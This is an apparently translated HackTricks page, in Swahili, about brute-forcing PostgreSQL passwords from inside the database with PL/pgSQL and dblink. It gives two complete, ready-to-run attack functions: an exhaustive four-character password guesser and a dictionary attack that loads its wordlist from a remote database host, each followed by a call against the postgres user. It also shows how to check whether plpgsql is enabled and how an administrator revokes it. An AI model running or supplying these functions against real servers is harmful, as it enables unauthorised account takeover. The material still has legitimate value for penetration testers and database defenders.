Swahili - Ht
HackTricks Training Twitter Linkedin Sponsor

PL/pgSQL Password Bruteforce

Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na htARTE (HackTricks AWS Red Team Expert)!

Pata mashambulizi zaidi kuhusu hili katika karatasi ya asili.

PL/pgSQL ni lugha kamili ya programu ambayo inazidi uwezo wa SQL kwa kutoa udhibiti ulioimarishwa wa taratibu. Hii ni pamoja na matumizi ya mizunguko na muundo mbalimbali wa udhibiti. Kazi zilizoundwa kwa lugha ya PL/pgSQL zinaweza kuitwa na taarifa za SQL na vifungo, kuongeza wigo wa shughuli ndani ya mazingira ya hifadhidata.

Unaweza kutumia lugha hii kudukua PostgreSQL ili kujaribu kuvunja nywila za watumiaji, lakini lazima iwe ipo kwenye hifadhidata. Unaweza kuthibitisha uwepo wake kwa kutumia:

SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+---------
plpgsql |

Kwa chaguo-msingi, kuunda kazi ni haki iliyotolewa kwa umma, ambapo UMMA inahusu kila mtumiaji kwenye mfumo huo wa database. Ili kuzuia hili, msimamizi angehitaji kurejesha haki ya MATUMIZI kutoka kwa kikoa cha UMMA:

REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;

Katika kesi hiyo, swali letu la awali litatoa matokeo tofauti:

SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+-----------------
plpgsql | {admin=U/admin}

Tafadhali kumbuka kuwa ili script ifuatayo ifanye kazi kazi ya dblink inahitajika. Ikiwa haipo, unaweza kujaribu kuunda kwa kutumia

CREATE EXTENSION dblink;

Kuvunja Nguvu ya Nenosiri

Hapa ndipo unaweza kutekeleza kuvunja nguvu ya nenosiri lenye herufi 4:

//Create the brute-force function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
username TEXT, dbname TEXT) RETURNS TEXT AS
$$
DECLARE
word TEXT;
BEGIN
FOR a IN 65..122 LOOP
FOR b IN 65..122 LOOP
FOR c IN 65..122 LOOP
FOR d IN 65..122 LOOP
BEGIN
word := chr(a) || chr(b) || chr(c) || chr(d);
PERFORM(SELECT * FROM dblink(' host=' || host ||
' port=' || port ||
' dbname=' || dbname ||
' user=' || username ||
' password=' || word,
'SELECT 1')
RETURNS (i INT));
RETURN word;
EXCEPTION
WHEN sqlclient_unable_to_establish_sqlconnection
THEN
-- do nothing
END;
END LOOP;
END LOOP;
END LOOP;
END LOOP;
RETURN NULL;
END;
$$ LANGUAGE 'plpgsql';

//Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');

Note kwamba hata kuvunja nguvu wahusika 4 inaweza kuchukua dakika kadhaa.

Unaweza pia kupakua orodha ya maneno na kujaribu nywila hizo tu (shambulio la kamusi):

//Create the function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
username TEXT, dbname TEXT) RETURNS TEXT AS
$$
BEGIN
FOR word IN (SELECT word FROM dblink('host=1.2.3.4
user=name
password=qwerty
dbname=wordlists',
'SELECT word FROM wordlist')
RETURNS (word TEXT)) LOOP
BEGIN
PERFORM(SELECT * FROM dblink(' host=' || host ||
' port=' || port ||
' dbname=' || dbname ||
' user=' || username ||
' password=' || word,
'SELECT 1')
RETURNS (i INT));
RETURN word;

EXCEPTION
WHEN sqlclient_unable_to_establish_sqlconnection THEN
-- do nothing
END;
END LOOP;
RETURN NULL;
END;
$$ LANGUAGE 'plpgsql'

-- Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Previousdblink/lo_import data exfiltrationNextNetwork - Privesc, Port Scanner and NTLM chanllenge response disclosure

Last updated